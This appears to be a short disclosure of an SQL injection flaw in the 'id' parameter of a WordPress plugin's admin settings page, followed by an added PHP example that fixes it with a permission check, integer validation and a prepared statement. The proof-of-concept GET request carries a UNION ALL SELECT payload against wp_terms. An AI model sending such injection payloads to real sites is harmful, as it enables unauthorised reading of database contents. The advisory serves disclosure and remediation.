Type user access: admin user. $_GET['id'] is not escaped. It is accessible only to admin users.
1 - Log in as an admin user; 2 - Send a GET request: http://www.example.com/wp-admin/admin.php?page=xtreme-locator-settings&id=0+UNION+ALL+SELECT+1%2Cslug%2Cname%2C4%2C5+FROM+wp_terms+WHERE+term_id%3D1
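
One way to handle the id parameter safely on the settings page, as an added example that is not the plugin's own code. The function name, the table name and the capability checked are assumptions; the plugin's real query is not shown in this advisory.

```php
<?php
// Added example: hardened lookup for the `id` parameter of an admin page.
// ASSUMPTIONS (hypothetical, not from the plugin): function name,
// table `xtreme_locator_items`, and the `manage_options` capability.

function xl_example_get_item_for_edit() {
    global $wpdb;

    // Enforce the admin-only restriction in code, not only via menu visibility.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // Accept only a plain decimal integer. A value such as
    // "0 UNION ALL SELECT 1,slug,name,4,5 FROM wp_terms ..." is rejected here.
    $raw = isset( $_GET['id'] ) ? wp_unslash( $_GET['id'] ) : '';
    if ( ! is_string( $raw ) || 1 !== preg_match( '/\A[0-9]+\z/', $raw ) ) {
        wp_die( 'Invalid id.', '', array( 'response' => 400 ) );
    }
    $id = absint( $raw );

    // Bind the value through a %d placeholder instead of concatenating it
    // into the SQL string, so it can never be parsed as SQL syntax.
    $table = $wpdb->prefix . 'xtreme_locator_items'; // hypothetical table
    $row   = $wpdb->get_row(
        $wpdb->prepare( "SELECT * FROM {$table} WHERE id = %d", $id )
    );

    return $row; // null when no row matches
}
```

Either the integer check or the prepared statement alone stops the UNION payload; using both keeps the query safe if one of them is later removed.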